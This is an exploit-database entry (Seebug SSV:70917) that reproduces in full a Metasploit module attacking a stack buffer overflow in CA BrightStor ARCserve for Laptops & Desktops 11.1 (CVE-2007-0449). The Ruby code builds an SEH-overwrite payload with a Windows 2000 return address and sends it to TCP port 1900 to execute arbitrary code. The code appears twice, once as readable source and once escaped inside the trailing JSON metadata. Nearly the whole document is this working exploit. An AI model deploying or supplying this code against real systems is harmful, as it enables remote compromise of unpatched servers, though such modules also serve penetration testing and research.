Search...

CA BrightStor ARCserve for Laptops & Desktops LGServer Buffer Overflow

2014-07-01T00:00:00

ID SSV:70917
Type seebug
Reporter Root
Modified 2014-07-01T00:00:00

Description

No description provided by source.

                                        
                                            
                                                ##
# $Id: lgserver.rb 9262 2010-05-09 17:45:00Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require &#39;msf/core&#39;

class Metasploit3 &#60; Msf::Exploit::Remote
	Rank = AverageRanking

	include Msf::Exploit::Remote::Tcp
	include Msf::Exploit::Remote::Seh

	def initialize(info = {})
		super(update_info(info,
			&#39;Name&#39;           =&#62; &#39;CA BrightStor ARCserve for Laptops & Desktops LGServer Buffer Overflow&#39;,
			&#39;Description&#39;    =&#62; %q{
					This module exploits a stack buffer overflow in Computer Associates BrightStor ARCserve Backup
				for Laptops & Desktops 11.1. By sending a specially crafted request, an attacker could
				overflow the buffer and execute arbitrary code.
			},
			&#39;Author&#39;         =&#62; [ &#39;MC&#39; ],
			&#39;License&#39;        =&#62; MSF_LICENSE,
			&#39;Version&#39;        =&#62; &#39;$Revision: 9262 $&#39;,
			&#39;References&#39;     =&#62;
				[
					[ &#39;CVE&#39;, &#39;2007-0449&#39; ],
					[ &#39;OSVDB&#39;, &#39;31593&#39; ],
					[ &#39;BID&#39;, &#39;22342&#39; ],
				],
			&#39;Privileged&#39;     =&#62; true,
			&#39;DefaultOptions&#39; =&#62;
				{
					&#39;EXITFUNC&#39; =&#62; &#39;process&#39;,
				},
			&#39;Payload&#39;        =&#62;
				{
					&#39;Space&#39;    =&#62; 600,
					&#39;BadChars&#39; =&#62; &#34;\x00\x0a\x0d\x5c\x5f\x2f\x2e&#34;,
					&#39;StackAdjustment&#39; =&#62; -3500,
				},
			&#39;Platform&#39; =&#62; &#39;win&#39;,
			&#39;Targets&#39;  =&#62;
				[
					[ &#39;Windows 2000 Pro English All&#39;,		{ &#39;Ret&#39; =&#62; 0x75022ac4 } ],
				],
			&#39;DisclosureDate&#39; =&#62; &#39;Jan 31 2007&#39;,
			&#39;DefaultTarget&#39; =&#62; 0))

		register_options(
			[
				Opt::RPORT(1900)
			], self.class)
	end

	def exploit
		connect

		filler = &#34;0000016705&#34; + rand_text_english(2322)
		seh    = generate_seh_payload(target.ret)
		sploit = filler + seh + &#34;\x58&#34; * 0x4141

		print_status(&#34;Trying target #{target.name}...&#34;)

		sock.put(sploit)
		handler
		disconnect
	end

end

JSON Vulners Source

Initial Source

{"enchantments": {"score": {"value": 0.1, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.1}, "bulletinFamily": "exploit", "enchantments_done": [], "href": "https://www.seebug.org/vuldb/ssvid-70917", "id": "SSV:70917", "sourceHref": "https://www.seebug.org/vuldb/ssvid-70917", "description": "No description provided by source.", "type": "seebug", "cvss": {"score": 0.0, "vector": "NONE"}, "lastseen": "2017-11-19T13:25:11", "references": [], "modified": "2014-07-01T00:00:00", "reporter": "Root", "status": "cve,poc", "viewCount": 2, "published": "2014-07-01T00:00:00", "cvelist": [], "title": "CA BrightStor ARCserve for Laptops & Desktops LGServer Buffer Overflow", "sourceData": "\n ##\r\n# $Id: lgserver.rb 9262 2010-05-09 17:45:00Z jduck $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = AverageRanking\r\n\r\n\tinclude Msf::Exploit::Remote::Tcp\r\n\tinclude Msf::Exploit::Remote::Seh\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'CA BrightStor ARCserve for Laptops & Desktops LGServer Buffer Overflow',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a stack buffer overflow in Computer Associates BrightStor ARCserve Backup\r\n\t\t\t\tfor Laptops & Desktops 11.1. By sending a specially crafted request, an attacker could\r\n\t\t\t\toverflow the buffer and execute arbitrary code.\r\n\t\t\t},\r\n\t\t\t'Author' => [ 'MC' ],\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Version' => '$Revision: 9262 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2007-0449' ],\r\n\t\t\t\t\t[ 'OSVDB', '31593' ],\r\n\t\t\t\t\t[ 'BID', '22342' ],\r\n\t\t\t\t],\r\n\t\t\t'Privileged' => true,\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'EXITFUNC' => 'process',\r\n\t\t\t\t},\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 600,\r\n\t\t\t\t\t'BadChars' => "\\x00\\x0a\\x0d\\x5c\\x5f\\x2f\\x2e",\r\n\t\t\t\t\t'StackAdjustment' => -3500,\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'Windows 2000 Pro English All',\t\t{ 'Ret' => 0x75022ac4 } ],\r\n\t\t\t\t],\r\n\t\t\t'DisclosureDate' => 'Jan 31 2007',\r\n\t\t\t'DefaultTarget' => 0))\r\n\r\n\t\tregister_options(\r\n\t\t\t[\r\n\t\t\t\tOpt::RPORT(1900)\r\n\t\t\t], self.class)\r\n\tend\r\n\r\n\tdef exploit\r\n\t\tconnect\r\n\r\n\t\tfiller = "0000016705" + rand_text_english(2322)\r\n\t\tseh = generate_seh_payload(target.ret)\r\n\t\tsploit = filler + seh + "\\x58" * 0x4141\r\n\r\n\t\tprint_status("Trying target #{target.name}...")\r\n\r\n\t\tsock.put(sploit)\r\n\t\thandler\r\n\t\tdisconnect\r\n\tend\r\n\r\nend\r\n\n ", "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645367207}}